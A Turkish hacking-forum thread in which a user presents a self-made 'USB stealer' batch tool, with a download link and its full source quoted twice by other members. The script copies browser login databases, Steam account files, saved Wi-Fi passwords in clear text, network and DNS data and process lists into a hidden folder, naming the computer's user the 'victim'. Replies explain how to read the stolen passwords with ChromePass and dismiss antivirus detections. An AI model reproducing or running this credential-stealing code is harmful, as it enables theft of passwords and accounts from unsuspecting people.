İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

M0NE3Y USB STEALER v1.0

Yufes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
2 Hafta önce
#1
M0NE3Y USB STEALER v1.0
Merhaba ben Yufes,

Sizlere kendi yaptığım usb stealerı göstermek istedim,
Not : M0N3Y sadece windows platformunda çalışabilmekte çünkü bat ile yazıldı.

M0NE3Y şunları yapabilmekte ;
-Kayıtlı modem şifrelerini çalma,
-ip config çıktısı alma,
-Google,Opera,Firefox ve Yandex login datalarını çalma
-Anlık çalışan uygulamaları gösterme,
-Steam id ve ismini çalma,
-Arama Geçmişini gösterme.

linke geçmeden önce belirtmeliyim,ben daha acemiyim ve bu uygulama bat ile yazıldı.
lütfen yorumlarınızı ona göre yapınız.

VirusTotal :
https://www.virustotal.com/gui/file/...b4fe/detection

İndirme linki ;
https://www.dosya.tc/server25/ez1gkh...EALER.exe.html

İyi günlerde kullanın!
Noah Parker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Nereden:
-
Mesajlar:
298
Konular:
70
Teşekkür (Etti):
326
Teşekkür (Aldı):
107
Ticaret:
(0) %
2 Hafta önce
#2
Cevap: M0NE3Y USB STEALER v1.0
Ellerine sağlık kaynak kodlarını öm'den atabilirmisin?
zalim581 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
3
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Ticaret:
(0) %
2 Hafta önce
#3
Cevap: M0NE3Y USB STEALER v1.0
Alıntı:
Noah Parker´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık kaynak kodlarını öm'den atabilirmisin?
Kod:
:kurulum @echo off
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
set cks =%mydate%:%mytime%
set vars=%cks::=. %
set name="..%username%.."
set dosya=%random%
color 0c
cls
title Usb Stealer - Upgraded /Yufes/
:kurulumklasor
md %name%%dosya%
attrib +s +h %name%%dosya%
cd %name%%dosya%
md 1-calinanlar
md 2-wifi
cd 1-calinanlar
md internet-sifreleri
md Steam-name_id
cd Steam-name_id
copy "C:\Program Files (x86)\Steam\config\loginusers.vdf" kullanici-isim_ve_id.txt
cd ../
cd internet-sifreleri
md firefox
md google
md opera
md yandex
:passwordsteal
cd google
copy "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
cd../
cd opera
copy "%userprofile%\AppData\Roaming\Opera Software\Opera Stable\Login Data"
cd../
cd yandex
copy "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default"
cd../
cd firefox
copy "%userprofile%\AppData\Mozilla\Firefox\Profiles"
cd ../../../
:2-wifihacking
cd 2-wifi
ipconfig /displaydns>aramagecmisi.txt
ipconfig>ipconfig.txt
rem Saved in D:\Temp\%random%.bat @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt @echo //////////////////////////Created By Yufes///////////////////////////////////////////>>!KayitliModemler.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>>!KayitliModemler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt
netsh wlan show profile * key=clear >>!KayitliModemler.txt
cd../
:hackinginf
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
rem Saved in D:\Temp\WriteText.bat @echo off @echo ----------------------------------------------------------------------------------------------------------------------> 4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt @echo //////////////////////////Created By Yufes///////////////////////////////////////////>>4-bilgi.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>>4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt @echo ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt @echo ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt @echo Kurban ismi : %username%>> 4-bilgi.txt @echo Calistirildigi Tarih/Zaman : %mydate%:%mytime%>> 4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////> 3-calisan_gorevler.txt @echo //////////////////////////Created By Yufes/////////////////////////////////////////// >> 3-calisan_gorevler.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>> 3-calisan_gorevler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>> 3-calisan_gorevler.txt @echo Calisan gorevlerin listesi ; >> 3-calisan_gorevler.txt @tasklist >> 3-calisan_gorevler.txt
cls
:lastof
ROBOCOPY 1-calinanlar 1-calinanlar /S /MOVE
cd../
attrib -s -h %name%%dosya%
Noah Parker Teşekkür etti.
Yufes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
2 Hafta önce
#4
Cevap: M0NE3Y USB STEALER v1.0
Alıntı:
zalim581´isimli üyeden Alıntı Mesajı göster
Kod:
:kurulum @echo off
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
set cks =%mydate%:%mytime%
set vars=%cks::=. %
set name="..%username%.."
set dosya=%random%
color 0c
cls
title Usb Stealer - Upgraded /Yufes/
:kurulumklasor
md %name%%dosya%
attrib +s +h %name%%dosya%
cd %name%%dosya%
md 1-calinanlar
md 2-wifi
cd 1-calinanlar
md internet-sifreleri
md Steam-name_id
cd Steam-name_id
copy "C:\Program Files (x86)\Steam\config\loginusers.vdf" kullanici-isim_ve_id.txt
cd ../
cd internet-sifreleri
md firefox
md google
md opera
md yandex
:passwordsteal
cd google
copy "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
cd../
cd opera
copy "%userprofile%\AppData\Roaming\Opera Software\Opera Stable\Login Data"
cd../
cd yandex
copy "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default"
cd../
cd firefox
copy "%userprofile%\AppData\Mozilla\Firefox\Profiles"
cd ../../../
:2-wifihacking
cd 2-wifi
ipconfig /displaydns>aramagecmisi.txt
ipconfig>ipconfig.txt
rem Saved in D:\Temp\%random%.bat @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt @echo //////////////////////////Created By Yufes///////////////////////////////////////////>>!KayitliModemler.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>>!KayitliModemler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt @echo . >>!KayitliModemler.txt
netsh wlan show profile * key=clear >>!KayitliModemler.txt
cd../
:hackinginf
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
rem Saved in D:\Temp\WriteText.bat @echo off @echo ----------------------------------------------------------------------------------------------------------------------> 4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt @echo //////////////////////////Created By Yufes///////////////////////////////////////////>>4-bilgi.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>>4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt @echo ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt @echo ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt @echo Kurban ismi : %username%>> 4-bilgi.txt @echo Calistirildigi Tarih/Zaman : %mydate%:%mytime%>> 4-bilgi.txt @echo /////////////////////////////////////////////////////////////////////////////////////> 3-calisan_gorevler.txt @echo //////////////////////////Created By Yufes/////////////////////////////////////////// >> 3-calisan_gorevler.txt @echo ////////////////////////////////Thanks For Using/////////////////////////////////////>> 3-calisan_gorevler.txt @echo /////////////////////////////////////////////////////////////////////////////////////>> 3-calisan_gorevler.txt @echo Calisan gorevlerin listesi ; >> 3-calisan_gorevler.txt @tasklist >> 3-calisan_gorevler.txt
cls
:lastof
ROBOCOPY 1-calinanlar 1-calinanlar /S /MOVE
cd../
attrib -s -h %name%%dosya%
Nasıl kodlari kirdin ?
zalim581 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
3
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Ticaret:
(0) %
2 Hafta önce
#5
Cevap: M0NE3Y USB STEALER v1.0
Alıntı:
Yufes´isimli üyeden Alıntı Mesajı göster
Nasıl kodlari kirdin ?
kodu "kırmadım". Batch scripti olduğunu kendin söylemişsin. sen scriptini exe'ye çevirdiğinde onu derlemiş olmuyorsun, sadece exe için gereken section/header vs. ile "wrapliyorsun", zip gibi düşün. kodunun okunamamasını istiyorsan bir programlama diliyle yazıp derlemelisin.
d11dd11 Teşekkür etti.
shellnetw0rk - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
96
Konular:
18
Teşekkür (Etti):
16
Teşekkür (Aldı):
17
Ticaret:
(0) %
2 Hafta önce
#6
Cevap: M0NE3Y USB STEALER v1.0
Dostum 4. bilgide kendi resmi adım çıktı onu nerden çekti acaba güvenlik amaçlı söylüyorum
felix55 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
2
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
2 Hafta önce
#7
Cevap: M0NE3Y USB STEALER v1.0
Bu kadar virüs neden ?
https://www.virustotal.com/gui/file/...b4fe/detection
rtfsec - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2019
Mesajlar:
70
Konular:
13
Teşekkür (Etti):
1
Teşekkür (Aldı):
13
Ticaret:
(0) %
2 Hafta önce
#8
Cevap: M0NE3Y USB STEALER v1.0
Kayıtlı şifreler Login Data adında bir dosyayla geliyor o dosya nasıl acılacak yani şifreleri nasıl okucaz
z2salkovski - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
root$
Mesajlar:
237
Konular:
16
Teşekkür (Etti):
3
Teşekkür (Aldı):
33
Ticaret:
(0) %
2 Hafta önce
#9
Cevap: M0NE3Y USB STEALER v1.0
Alıntı:
Yufes´isimli üyeden Alıntı Mesajı göster
Nasıl kodlari kirdin ?
notepad++?
--------------------- Gül rengi fermente üzüm suyu, içilmez mi böyle günde?
637ad44b4e72e2b58fa8c5d0cac6701d
Yufes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
2 Hafta önce
#10
Alıntı:
shellnetw0rk´isimli üyeden Alıntı Mesajı göster
Dostum 4. bilgide kendi resmi adım çıktı onu nerden çekti acaba güvenlik amaçlı söylüyorum
Bilgisayar adini otomatik kopyaliyor,korkulacak birşey yok.

Alıntı:
felix55´isimli üyeden Alıntı Mesajı göster
Bat dosyasini exeye cevirirken virus olarak algilaniyor.Uygulamadan kaynakli degil tum bat to exe ceviricileri boyle.

Alıntı:
rtfsec´isimli üyeden Alıntı Mesajı göster
Kayıtlı şifreler Login Data adında bir dosyayla geliyor o dosya nasıl acılacak yani şifreleri nasıl okucaz
Chromepass yukluyosun orda sol uste tiklayip dosya yolunu datanin oldugu klasörü seciyorsun.
Not:tek seferde 1 tane okutturabilirsin.

Alıntı:
z2salkovski´isimli üyeden Alıntı Mesajı göster
notepad++?
Exe ye dönüştürülmüş bat dosyasini notepad++ ile okumaya çalışınca kodlar gözükmüyor.
Konu "Squ4LL tarafından (bir Hafta önce Saat 23:10 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı